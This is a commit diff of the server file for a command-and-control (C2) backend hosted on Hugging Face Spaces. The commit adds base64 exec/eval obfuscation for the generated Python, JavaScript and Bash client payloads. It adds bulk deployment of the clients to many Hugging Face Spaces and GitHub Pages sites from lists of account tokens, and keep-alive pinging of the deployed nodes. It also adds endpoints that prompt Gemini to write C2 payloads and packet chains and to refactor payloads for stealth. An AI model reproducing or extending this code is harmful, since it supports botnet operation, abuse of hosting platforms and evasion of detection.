Spaces:

wuhp
/

notc2docker

Sleeping

App Files Files Community

wuhp commited on 27 days ago

Commit

2815652

verified ·

1 Parent(s): 41249a7

Update server.ts

Browse files

Files changed (1) hide show

server.ts +247 -128

server.ts CHANGED Viewed

@@ -15,6 +15,64 @@ const PORT = parseInt(process.env.PORT as string, 10) || 3000;
 app.use(cors({ origin: '*' })); // Allow cross-origin requests from generated clients
 app.use(express.json());
 // In-memory state
 const STATE = {
   tokens: {
@@ -24,9 +82,16 @@ const STATE = {
   nodes: new Map(),
   reports: [],
   commands: [],
-  deployments: new Set()
 };
 // --- Security / Token Management ---
 setInterval(() => {
@@ -109,7 +174,8 @@ app.get('/api/status', (req, res) => {
     nodes: Array.from(STATE.nodes.values()),
     reports: STATE.reports,
     activeCommands: STATE.commands.filter(c => c.repeat),
-    deployments: Array.from(STATE.deployments)
   });
 });
@@ -150,39 +216,55 @@ function getServerUrl(req) {
   return url.replace(/\/$/, "");
 }
 app.get('/api/payloads/:type', (req, res) => {
   const serverUrl = getServerUrl(req);
   const type = req.params.type;
   let files = {};
   if (type === 'hf_docker') {
-    files['Dockerfile'] = `FROM python:3.11-slim
-WORKDIR /app
-RUN apt-get update && apt-get install -y iputils-ping traceroute procps && rm -rf /var/lib/apt/lists/*
-COPY requirements.txt .
-RUN pip install --no-cache-dir -r requirements.txt
-COPY client.py .
-CMD ["python", "client.py"]`;
     files['requirements.txt'] = `requests>=2.31.0`;
-    files['client.py'] = getPythonClient(serverUrl, 'hf_docker');
   }
   else if (type === 'hf_gradio') {
-    files['app.py'] = getGradioClient(serverUrl);
     files['requirements.txt'] = `requests>=2.31.0\ngradio>=4.0.0`;
   }
   else if (type === 'gh_pages') {
     files['index.html'] = getHtmlClient(serverUrl);
   }
   else if (type === 'linux_local') {
-    files['monitor.sh'] = getBashClient(serverUrl);
   }
   else if (type === 'windows_local') {
     files['monitor.ps1'] = getPowershellClient(serverUrl);
   } else if (type === 'python_script') {
-    files['client.py'] = getPythonClient(serverUrl, 'python_local');
   } else if (type === 'node_js') {
-    files['client.js'] = getNodeJsClient(serverUrl);
   } else if (type === 'c_binary') {
     files['client.c'] = getCClient(serverUrl);
     files['build.sh'] = "gcc client.c -o client -lcurl && ./client\\n";
@@ -208,140 +290,168 @@ CMD ["python", "client.py"]`;
 // --- Deploy Endpoints ---
 app.post('/api/deploy/hf', async (req, res) => {
   const { name, sdk } = req.body;
-  const token = STATE.tokens.hf_token;
-  if (!token) return res.status(401).json({ error: 'HF Token not set' });
-  try {
-    const userRes = await fetch('https://huggingface.co/api/whoami-v2', {
-      headers: { Authorization: `Bearer ${token}` }
-    });
-    if (!userRes.ok) throw new Error('Invalid HF token');
-    const user = await userRes.json();
-    const username = user.name || user.id;
-    const finalName = name || `node-${crypto.randomBytes(3).toString('hex')}`;
-    const repo_id = `${username}/${finalName}`;
     try {
-      const createRes = await fetch('https://huggingface.co/api/repos/create', {
-        method: 'POST',
-        headers: { Authorization: `Bearer ${token}`, 'Content-Type': 'application/json' },
-        // Use space_sdk for HF Hub API to create spaces.
-        body: JSON.stringify({ name: finalName, type: 'space', sdk: sdk })
       });
-      if (!createRes.ok) {
-        const errorText = await createRes.text();
-        // Ignore "already exists" errors, otherwise throw
-        if (!errorText.includes('already exists')) {
-          console.error("HF Repo Create Error:", errorText);
-          throw new Error('Failed to create space: ' + errorText);
         }
       }
-    } catch(e) {
-      if (e.message.includes('Failed to create space')) {
-        throw e;
       }
-    } // May already exist
-    // Wait a brief moment for HF infrastructure to catch up after repo creation
-    await new Promise(r => setTimeout(r, 3000));
-    const serverUrl = getServerUrl(req);
-    let files = [];
-    if (sdk === 'docker') {
-      files.push({ path: 'Dockerfile', contents: `FROM python:3.11-slim\nWORKDIR /app\nRUN apt-get update && apt-get install -y iputils-ping traceroute procps && rm -rf /var/lib/apt/lists/*\nCOPY requirements.txt .\nRUN pip install --no-cache-dir -r requirements.txt\nCOPY client.py .\nCMD ["python", "client.py"]` });
-      files.push({ path: 'requirements.txt', contents: `requests>=2.31.0` });
-      files.push({ path: 'client.py', contents: getPythonClient(serverUrl, 'hf_docker') });
-    } else {
-      files.push({ path: 'app.py', contents: getGradioClient(serverUrl) });
-      files.push({ path: 'requirements.txt', contents: `requests>=2.31.0\ngradio>=4.0.0` });
     }
-    await commit({
-      repo: { type: 'space', name: repo_id },
-      credentials: { accessToken: token },
-      title: "Deploying client",
-      operations: files.map(f => ({
-        operation: 'addOrUpdate',
-        path: f.path,
-        content: new Blob([f.contents])
-      }))
-    });
-    res.json({ success: true, url: `https://huggingface.co/spaces/${repo_id}` });
-    const directUrl = `https://${username}-${finalName.replace(/\./g, '-')}.hf.space`;
-    STATE.deployments.add(directUrl);
-    let hfPings = 0;
-    const hfInterval = setInterval(() => {
-      fetch(directUrl).catch(() => {});
-      hfPings++;
-      if (hfPings >= 12) clearInterval(hfInterval);
-    }, 10000);
-  } catch (error) {
-    res.status(500).json({ error: error.message });
   }
 });
 app.post('/api/deploy/github', async (req, res) => {
   const { name } = req.body;
-  const token = STATE.tokens.github_token;
-  if (!token) return res.status(401).json({ error: 'GitHub Token not set' });
-  try {
-    const userRes = await fetch('https://api.github.com/user', {
-      headers: { Authorization: `Bearer ${token}` }
-    });
-    if (!userRes.ok) throw new Error('Invalid GitHub token');
-    const user = await userRes.json();
-    const username = user.login;
-    const finalName = name || `node-${crypto.randomBytes(3).toString('hex')}`;
-    await fetch('https://api.github.com/user/repos', {
-      method: 'POST',
-      headers: { Authorization: `Bearer ${token}`, 'Content-Type': 'application/json' },
-      body: JSON.stringify({ name: finalName, auto_init: false })
-    });
-    await new Promise(r => setTimeout(r, 2000)); // wait for repo creation
-    const serverUrl = getServerUrl(req);
-    const content = Buffer.from(getHtmlClient(serverUrl)).toString('base64');
-    await fetch(`https://api.github.com/repos/${username}/${finalName}/contents/index.html`, {
-      method: 'PUT',
-      headers: { Authorization: `Bearer ${token}`, 'Content-Type': 'application/json' },
-      body: JSON.stringify({
-        message: 'Deploy client',
-        content
-      })
-    });
-    await new Promise(r => setTimeout(r, 6000)); // Wait for commit to settle
-    // Enable GitHub Pages
-    await fetch(`https://api.github.com/repos/${username}/${finalName}/pages`, {
-      method: 'POST',
-      headers: { Authorization: `Bearer ${token}`, 'Content-Type': 'application/json', 'Accept': 'application/vnd.github.switcheroo-preview+json' },
-      body: JSON.stringify({
-        source: { branch: 'main', path: '/' }
-      })
-    }).catch(()=>{});
-    const directUrl = `https://${username}.github.io/${finalName}/`;
-    STATE.deployments.add(directUrl);
-    res.json({ success: true, url: directUrl });
-    // Auto-ping github pages (retry a few times over a minute)
-    let pings = 0;
-    const interval = setInterval(() => {
-      fetch(directUrl).catch(() => {});
-      pings++;
-      if (pings >= 12) clearInterval(interval);
-    }, 10000);
-  } catch (error) {
-    res.status(500).json({ error: error.message });
   }
 });
@@ -1379,6 +1489,15 @@ async function startServer() {
     });
   }
   app.listen(PORT, "0.0.0.0", () => {
     console.log(`Backend running on http://localhost:${PORT}`);
   });

 app.use(cors({ origin: '*' })); // Allow cross-origin requests from generated clients
 app.use(express.json());
+import { GoogleGenAI } from '@google/genai';
+app.post('/api/ai/generate-payload', async (req, res) => {
+  try {
+    const ai = new GoogleGenAI({ apiKey: process.env.GEMINI_API_KEY });
+    const { prompt } = req.body;
+    const response = await ai.models.generateContent({
+      model: 'gemini-2.5-pro',
+      contents: `You are an expert at creating Python/JS/Bash node clients for a C2 system.
+The system sends JSON commands and the node processes them.
+Generate a raw script payload for the following request: ${prompt}.
+CRITICAL: Only output the raw script code. Do not include markdown formatting, backticks, or explanations.`,
+    });
+    res.json({ code: response.text?.replace(/^```[a-z]*\n/, '').replace(/\n```$/, '') });
+  } catch (e: any) {
+    res.status(500).json({ error: e.message });
+  }
+});
+app.post('/api/ai/generate-packets', async (req, res) => {
+  try {
+    const ai = new GoogleGenAI({ apiKey: process.env.GEMINI_API_KEY });
+    const { prompt } = req.body;
+    const response = await ai.models.generateContent({
+      model: 'gemini-2.5-pro',
+      contents: `You are an expert at crafting custom JSON packet chains for a C2 system.
+The user wants to generate a sequence of valid custom commands or packets for: ${prompt}.
+CRITICAL: Output ONLY a valid JSON array of command objects. Example format: [{"type": "some_action", "payload": {"key": "val"}}].
+Do NOT include any markdown formatting, backticks, or explanations.`,
+    });
+    let text = response.text || "[]";
+    text = text.replace(/^```[a-z]*\n/, '').replace(/\n```$/, '');
+    const packets = JSON.parse(text); // Check if it's valid JSON
+    res.json({ packets });
+  } catch (e: any) {
+    res.status(500).json({ error: e.message });
+  }
+});
+app.post('/api/ai/evaluate-payload', async (req, res) => {
+  try {
+    const ai = new GoogleGenAI({ apiKey: process.env.GEMINI_API_KEY });
+    const { code } = req.body;
+    const response = await ai.models.generateContent({
+      model: 'gemini-2.5-pro',
+      contents: `You are a Senior Security Engineer. Review the following payload code for efficiency, robustness, and stealth.
+Identify any bugs or improvements, then provide the refactored code.
+CRITICAL: Only output the raw improved script code. No markdown formatting, backticks, or explanations. Do not include your analysis text in the final output, just clean raw code.
+Code to improve:
+${code}`,
+    });
+    res.json({ code: response.text?.replace(/^```[a-z]*\n/, '').replace(/\n```$/, '') });
+  } catch (e: any) {
+    res.status(500).json({ error: e.message });
+  }
+});
 // In-memory state
 const STATE = {
   tokens: {
   nodes: new Map(),
   reports: [],
   commands: [],
+  deployments: new Set(),
+  deployLogs: []
 };
+// ...
+function logDeploy(msg) {
+  STATE.deployLogs.unshift({ time: Date.now(), msg });
+  if (STATE.deployLogs.length > 50) STATE.deployLogs.pop();
+}
 // --- Security / Token Management ---
 setInterval(() => {
     nodes: Array.from(STATE.nodes.values()),
     reports: STATE.reports,
     activeCommands: STATE.commands.filter(c => c.repeat),
+    deployments: Array.from(STATE.deployments),
+    deployLogs: STATE.deployLogs
   });
 });
   return url.replace(/\/$/, "");
 }
+function obfuscatePython(code) {
+  const b64 = Buffer.from(code).toString('base64');
+  return `import base64\nexec(base64.b64decode("${b64}").decode('utf-8'))\n`;
+}
+function obfuscateJS(code) {
+  const b64 = Buffer.from(code).toString('base64');
+  return `eval(Buffer.from("${b64}", 'base64').toString('utf8'));\n`;
+}
 app.get('/api/payloads/:type', (req, res) => {
   const serverUrl = getServerUrl(req);
   const type = req.params.type;
+  const obfuscate = req.query.obfuscate === 'true';
   let files = {};
   if (type === 'hf_docker') {
+    files['Dockerfile'] = `FROM python:3.11-slim\nWORKDIR /app\nRUN apt-get update && apt-get install -y iputils-ping traceroute procps && rm -rf /var/lib/apt/lists/*\nCOPY requirements.txt .\nRUN pip install --no-cache-dir -r requirements.txt\nCOPY client.py .\nCMD ["python", "client.py"]`;
     files['requirements.txt'] = `requests>=2.31.0`;
+    let code = getPythonClient(serverUrl, 'hf_docker');
+    if (obfuscate) code = obfuscatePython(code);
+    files['client.py'] = code;
   }
   else if (type === 'hf_gradio') {
+    let code = getGradioClient(serverUrl);
+    if (obfuscate) code = obfuscatePython(code);
+    files['app.py'] = code;
     files['requirements.txt'] = `requests>=2.31.0\ngradio>=4.0.0`;
   }
   else if (type === 'gh_pages') {
     files['index.html'] = getHtmlClient(serverUrl);
   }
   else if (type === 'linux_local') {
+    let code = getBashClient(serverUrl);
+    // basic sh obfuscation
+    if (obfuscate) code = `eval "$(echo '${Buffer.from(code).toString('base64')}' | base64 -d)"`;
+    files['monitor.sh'] = code;
   }
   else if (type === 'windows_local') {
     files['monitor.ps1'] = getPowershellClient(serverUrl);
   } else if (type === 'python_script') {
+    let code = getPythonClient(serverUrl, 'python_local');
+    if (obfuscate) code = obfuscatePython(code);
+    files['client.py'] = code;
   } else if (type === 'node_js') {
+    let code = getNodeJsClient(serverUrl);
+    if (obfuscate) code = obfuscateJS(code);
+    files['client.js'] = code;
   } else if (type === 'c_binary') {
     files['client.c'] = getCClient(serverUrl);
     files['build.sh'] = "gcc client.c -o client -lcurl && ./client\\n";
 // --- Deploy Endpoints ---
 app.post('/api/deploy/hf', async (req, res) => {
   const { name, sdk } = req.body;
+  const tokens = STATE.tokens.hf_token.split(',').map(s => s.trim()).filter(Boolean);
+  if (tokens.length === 0) return res.status(401).json({ error: 'HF Token not set' });
+  logDeploy(`Starting bulk HF Deploy across ${tokens.length} accounts: ${name || 'auto'} (${sdk})`);
+  let deployedUrls = [];
+  let deploymentErrors = [];
+  // Respond early since this could take a while
+  res.json({ success: true, message: `Dispatched ${tokens.length} deployments.` });
+  for (let i = 0; i < tokens.length; i++) {
+    const token = tokens[i];
     try {
+      if (i > 0) await new Promise(r => setTimeout(r, 2000)); // Rate limiting
+      const userRes = await fetch('https://huggingface.co/api/whoami-v2', {
+        headers: { Authorization: `Bearer ${token}` }
       });
+      if (!userRes.ok) throw new Error(`Invalid HF token (Token #${i + 1})`);
+      const user = await userRes.json();
+      const username = user.name || user.id;
+      const finalName = name || `node-${crypto.randomBytes(3).toString('hex')}`;
+      const repo_id = `${username}/${finalName}`;
+      logDeploy(`Creating HF Space: ${repo_id}`);
+      try {
+        const createRes = await fetch('https://huggingface.co/api/repos/create', {
+          method: 'POST',
+          headers: { Authorization: `Bearer ${token}`, 'Content-Type': 'application/json' },
+          body: JSON.stringify({ name: finalName, type: 'space', sdk: sdk })
+        });
+        if (!createRes.ok) {
+          const errorText = await createRes.text();
+          if (!errorText.includes('already exists')) {
+            throw new Error(`Failed to create space ${repo_id}: ` + errorText);
+          }
         }
+      } catch(e) {
+        if (e.message.includes('Failed to create space')) throw e;
       }
+      await new Promise(r => setTimeout(r, 4000));
+      const serverUrl = getServerUrl(req);
+      let files = [];
+      if (sdk === 'docker') {
+        files.push({ path: 'Dockerfile', contents: `FROM python:3.11-slim\nWORKDIR /app\nRUN apt-get update && apt-get install -y iputils-ping traceroute procps && rm -rf /var/lib/apt/lists/*\nCOPY requirements.txt .\nRUN pip install --no-cache-dir -r requirements.txt\nCOPY client.py .\nCMD ["python", "client.py"]` });
+        files.push({ path: 'requirements.txt', contents: `requests>=2.31.0` });
+        files.push({ path: 'client.py', contents: getPythonClient(serverUrl, 'hf_docker') });
+      } else {
+        files.push({ path: 'app.py', contents: getGradioClient(serverUrl) });
+        files.push({ path: 'requirements.txt', contents: `requests>=2.31.0\ngradio>=4.0.0` });
       }
+      await commit({
+        repo: { type: 'space', name: repo_id },
+        credentials: { accessToken: token },
+        title: "Deploying client",
+        operations: files.map(f => ({
+          operation: 'addOrUpdate',
+          path: f.path,
+          content: new Blob([f.contents])
+        }))
+      });
+      logDeploy(`Successfully deployed HF Space: ${repo_id}`);
+      deployedUrls.push(`https://huggingface.co/spaces/${repo_id}`);
+      const directUrl = `https://${username}-${finalName.replace(/\./g, '-')}.hf.space`;
+      STATE.deployments.add(directUrl);
+      let hfPings = 0;
+      const hfInterval = setInterval(() => {
+        fetch(directUrl).catch(() => {});
+        hfPings++;
+        if (hfPings >= 12) clearInterval(hfInterval);
+      }, 10000);
+    } catch (err) {
+      logDeploy(`Error on HF deploy (${i+1}/${tokens.length}): ${err.message}`);
+      deploymentErrors.push(err.message);
     }
   }
 });
 app.post('/api/deploy/github', async (req, res) => {
   const { name } = req.body;
+  const tokens = STATE.tokens.github_token.split(',').map(s => s.trim()).filter(Boolean);
+  if (tokens.length === 0) return res.status(401).json({ error: 'GitHub Token not set' });
+  logDeploy(`Starting bulk GitHub Deploy across ${tokens.length} accounts: ${name || 'auto'}`);
+  let deployedUrls = [];
+  let deploymentErrors = [];
+  // Respond early
+  res.json({ success: true, message: `Dispatched ${tokens.length} GitHub deployments.` });
+  for (let i = 0; i < tokens.length; i++) {
+    const token = tokens[i];
+    try {
+      if (i > 0) await new Promise(r => setTimeout(r, 2000)); // Rate limit
+      const userRes = await fetch('https://api.github.com/user', {
+        headers: { Authorization: `Bearer ${token}` }
+      });
+      if (!userRes.ok) throw new Error(`Invalid GitHub token (Token #${i + 1})`);
+      const user = await userRes.json();
+      const username = user.login;
+      const finalName = name || `node-${crypto.randomBytes(3).toString('hex')}`;
+      logDeploy(`Creating GitHub repo: ${username}/${finalName}`);
+      await fetch('https://api.github.com/user/repos', {
+        method: 'POST',
+        headers: { Authorization: `Bearer ${token}`, 'Content-Type': 'application/json' },
+        body: JSON.stringify({ name: finalName, auto_init: false })
+      });
+      await new Promise(r => setTimeout(r, 2000)); // wait for repo creation
+      const serverUrl = getServerUrl(req);
+      const content = Buffer.from(getHtmlClient(serverUrl)).toString('base64');
+      await fetch(`https://api.github.com/repos/${username}/${finalName}/contents/index.html`, {
+        method: 'PUT',
+        headers: { Authorization: `Bearer ${token}`, 'Content-Type': 'application/json' },
+        body: JSON.stringify({
+          message: 'Deploy client',
+          content
+        })
+      });
+      await new Promise(r => setTimeout(r, 6000)); // Wait for commit to settle
+      logDeploy(`Enabling GitHub Pages for ${username}/${finalName}...`);
+      // Enable GitHub Pages
+      await fetch(`https://api.github.com/repos/${username}/${finalName}/pages`, {
+        method: 'POST',
+        headers: { Authorization: `Bearer ${token}`, 'Content-Type': 'application/json', 'Accept': 'application/vnd.github.switcheroo-preview+json' },
+        body: JSON.stringify({
+          source: { branch: 'main', path: '/' }
+        })
+      }).catch(()=>{});
+      const directUrl = `https://${username}.github.io/${finalName}/`;
+      STATE.deployments.add(directUrl);
+      logDeploy(`Successfully deployed to GH Pages: ${directUrl}`);
+      deployedUrls.push(directUrl);
+      // Auto-ping github pages (retry a few times over a minute)
+      let pings = 0;
+      const interval = setInterval(() => {
+        fetch(directUrl).catch(() => {});
+        pings++;
+        if (pings >= 12) clearInterval(interval);
+      }, 10000);
+    } catch (err) {
+      logDeploy(`Error on GitHub deploy (${i+1}/${tokens.length}): ${err.message}`);
+      deploymentErrors.push(err.message);
+    }
   }
 });
     });
   }
+  // Keep deployments alive
+  setInterval(() => {
+    if (STATE.deployments.size > 0) {
+      for (const url of Array.from(STATE.deployments)) {
+        fetch(url).catch(() => {});
+      }
+    }
+  }, 30000);
   app.listen(PORT, "0.0.0.0", () => {
     console.log(`Backend running on http://localhost:${PORT}`);
   });